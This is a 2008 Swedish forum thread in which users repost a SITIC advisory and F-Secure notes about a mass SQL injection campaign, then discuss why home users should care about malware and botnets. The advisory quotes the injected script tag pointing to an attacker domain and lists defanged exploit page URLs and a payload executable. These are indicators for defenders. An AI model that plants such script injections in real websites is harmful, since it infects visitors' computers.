brainslicer Postad 24 April , 2008 Rapport Postad 24 April , 2008 http://www.sitic.se/publikationer/namnvart/flertalet-svenska-hemsidor-infekterade Flertalet svenska hemsidor infekteradeDe senaste veckorna har ett stort antal svenska hemsidor blivit infekterade med skadlig kod. Ett litet java-script har lagt till i källkoden på hemsidorna. Koden skickar i tysthet besökaren vidare till en hemsida där skadlig kod försöker installeras på besökarens dator. Allt sker i bakgrunden så användaren ser inte att detta sker. En sökning på Google ger snabbt svar på hemsidor som är eller har varit infekterade: http://www.google.se/search?hl=sv&q=%3Cscript+src%3D%22http%3A%2F%2F%22+%22%2F1.js%22+&btnG=Sök&meta=cr%3DcountrySE Koden som läggs till på hemsidan är: "<script src=http://www.nihaorr1.com/1.js>". Efter att man hämtat hem "1.js" slussas klienten vidare till olika sidor som försöker infektera klienten: hxxp://www.nihaorr1.com/cuteqq.htm hxxp://www.nihaorr1.com/Ms07055.htm hxxp://www.nihaorr1.com/Yahoo.php hxxp://www.nihaorr1.com/cuteqq.htm hxxp://www.nihaorr1.com/Ms07055.htm hxxp://www.nihaorr1.com/Ms07033.htm hxxp://www.nihaorr1.com/Ms07018.htm hxxp://www.nihaorr1.com/Ms07004.htm hxxp://www.nihaorr1.com/Ajax.htm hxxp://www.nihaorr1.com/Ms06014.htm Vid lyckad exploatering laddas "hxxp://www.nihaorr1.com/test.exe" ned och exekveras. Webbservern som www.nihaorr1.com pekar på svarar i nuläget inte på HTTP-anrop på port 80. Sitic rekommenderar att man kontinuerligt verifierar att källkoden på ens webbserver inte modifierats. Det kan göras med hjälp av hash-funktioner som MD5 eller SHA1 alternativt att man jämför med koden i sitt "repository". Citera
brainslicer Postad 24 April , 2008 Författare Rapport Postad 24 April , 2008 Mera om ovanstående: Mass SQL injection There's another round of mass SQL injections going on which has infected hundreds of thousands of websites.Performing a Google search results in over 510,000 modified pages. ... So what should you do? First of all, search your website logs for the code above and see if you've been hit. If so, clean up your database to prevent your website visitors from becoming infected. Second, make sure that all the data you pass to your database is sanitized and that no code elements can be stored there. Third, block access to the sites above. Fourth, make sure the software you use is patched, F-Secure Health Check is an easy way to do this. Fifth, keep your antivirus solution up-to-date. F-Secure uppmärksammar hemsidehacken F-Secure har på sin blogg uppmärksammat hemsidehacken vi skrev om igår samt släppt ytterligare information. Enligt F-Secure handlar det nu om 3-domäner (nmidahena.com, aspder.com och nihaorr1.com) där skadlig kod finns uppladdat för att infektera klienter. Sitic rekommnderar precis som F-Secure att man blockerar access till dessa sidor i sin firewall och proxy. Citera
Joeduck Postad 24 April , 2008 Rapport Postad 24 April , 2008 Vart får man tag på exe filen? :& Citera
Black_Jim Postad 24 April , 2008 Rapport Postad 24 April , 2008 Jag har aldrig brytt mej om dessa virusvarningar som man får genom media. Hur allvarligt är det egentligen? Från en objektiv person som inte har medias intresse av att skrämma folk. Vad är det värsta som kan hända? Om jag inte har några större summor på pokerkonton, bankkonton och dylikt. Är det pengar folk är ute efter? Drabbar det mej vars liv inte hänger på min dator? Det värsta som händer om någon slår ut min dator är väl att PT nollställs... enl. mej då... vad ska jag mer oroa mej för? Om jag drabbas, kan jag bara formatera om datorn så är allt bra igen? Varför lever vi i en så datorberoende värld? Det hade väl räckt med att uppfinna en pokerdator som inte gjorde annat än tillät poker...? Citera
brainslicer Postad 25 April , 2008 Författare Rapport Postad 25 April , 2008 Är väl inte från media? Denna tex kom från sitic (Sveriges IT-incidentcentrum Post- och telestyrelsen) Trots att man själva kanske anser att det inte finns nåt av värde på datorn betyder inte att alla ser det så... bl.a. göra datorn till del av botnet, använda lagringsutrymmet, utnyttja bandbredden, proxy för att dölja sig själv, spamma ifrån ....är alltid av värde för angriparna Citera
_zed_ Postad 25 April , 2008 Rapport Postad 25 April , 2008 Jag har aldrig brytt mej om dessa virusvarningar som man får genom media. Hur allvarligt är det egentligen? Från en objektiv person som inte har medias intresse av att skrämma folk. Vad är det värsta som kan hända? Om jag inte har några större summor på pokerkonton, bankkonton och dylikt. Är det pengar folk är ute efter? Drabbar det mej vars liv inte hänger på min dator? Det värsta som händer om någon slår ut min dator är väl att PT nollställs... enl. mej då... vad ska jag mer oroa mej för? Om jag drabbas, kan jag bara formatera om datorn så är allt bra igen? Varför lever vi i en så datorberoende värld? Det hade väl räckt med att uppfinna en pokerdator som inte gjorde annat än tillät poker...? Jag tänkte tidigare som dig. Jag hade inget viktigt på datorn, surfade inte så mycket och hade därför slö uppkoppling - jag var inte rädd för att få virus eftersom jag tänkte att om datorn slås ut får jag väl fomatera om den. Men sedan fick jag ett långt brev från Telia Sonera där de började med att förklara att det varit ett stort antal virusattacker på senaste tiden och bla, bla, massor kring detta. Jaha, nu vill de sälja virusskydd tänkte jag... När jag sedan lite längre ner kunde läsa att de nu lokaliserat var attackerna kom från, och att det var från min dator, kändes det inte riktigt lika bra De uppmanade mig att se till så detta upphörde annars skulle de vidta åtgärder, typ... Jag skaffade ett virusprogram som lokaliserade ett antal virus och liknande program på min dator. Jag hade alltså själv inte haft ont av detta, men min dator utnyttjades till att förstöra för andra. Så man ska nog inte blunda för detta allt för mycket... på sin höjd kisa lite... Citera
Black_Jim Postad 25 April , 2008 Rapport Postad 25 April , 2008 Är väl inte från media? Denna tex kom från sitic (Sveriges IT-incidentcentrum Post- och telestyrelsen) Trots att man själva kanske anser att det inte finns nåt av värde på datorn betyder inte att alla ser det så... bl.a. göra datorn till del av botnet, använda lagringsutrymmet, utnyttja bandbredden, proxy för att dölja sig själv, spamma ifrån ....är alltid av värde för angriparna Nej, syftade inte just på denna, men i allmänhet så är ju media väldigt snabba att blåsa upp stora rubriker för ingenting... Speciellt när det gäller virus eftersom det berör så många... ..och media är min stora hackkyckling här i världen om du inte visste det, speciellt aftonblaskan... Kan folk använda min dator när den är avstängd, t ex för att sprida virus? eller startar det i samma stund jag slår på den? Citera
brainslicer Postad 25 April , 2008 Författare Rapport Postad 25 April , 2008 Kan folk använda min dator när den är avstängd, t ex för att sprida virus? eller startar det i samma stund jag slår på den? men vissa router modeller http://pokerforum.nu/forum/datorsaekerhet/46598-botnet-baserat-pa-bredbandsroutrar.html Citera
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.